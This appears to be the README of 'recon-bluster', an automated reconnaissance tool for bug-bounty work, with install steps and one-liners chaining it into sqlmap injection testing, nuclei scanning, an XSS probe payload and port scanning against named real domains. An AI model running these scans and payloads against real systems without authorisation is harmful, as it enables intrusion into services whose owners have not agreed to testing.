recon-bluster is a automated recon tools based on target domain. Combining a set of the best recon tools to enumeration endpoint and generate a target endpoint for further vulnerability scanning. Capable to perform multi-threading for concurrent target recon.
git clone https://github.com/superzerosec/recon-bluster.git
cd recon-bluster
bash install.shusage: recon-bluster.py [-h] [-d DOMAIN] [-l LIST] [-t THREAD] [-i]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Target domain
-l LIST, --list LIST List of target domain saperated with new line
-t THREAD, --thread THREAD
Number of thread, default 5
-i, --intel Amass intel recon, default FalseRecon single target on tesla.com
python3 recon-bluster.py -d tesla.comFor multiple target in file, create a list.txt
bugcrowd.com
tesla.com
uber.comRecon multiple target on list.txt
python3 recon-bluster.py -l list.txtTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; sqlmap -m $TARGET/target_sqli.txt --random-agent --batchTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; nuclei -silent -l $TARGET/subdomains_httpx.txt -jsonl -o $TARGET/subdomains_nuclei_vulnerabilities_$(date +%Y-%m-%d_%H:%M:%S).json -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" --severity low,medium,high,criticalTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; cat $TARGET/target_xss.txt | qsreplace '"><img src=x onerror=prompt(1)>' | airixss -payload '<img src=x onerror=prompt(1)>' | grep "31mVulnerable" | anew target_xss_airixss.txtTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; smap -iL $TARGET/subdomains.txt -oG $TARGET/subdomains_smap.txtTARGET=tesla.com; python3 ~/tools/waymore/waymore.py -mode U -i $TARGET; cat ~/tools/waymore/results/$TARGET/waymore.txt | anew $TARGET/subdomains_urls_waymore.txt > $TARGET/subdomains_urls_waymore_new.txt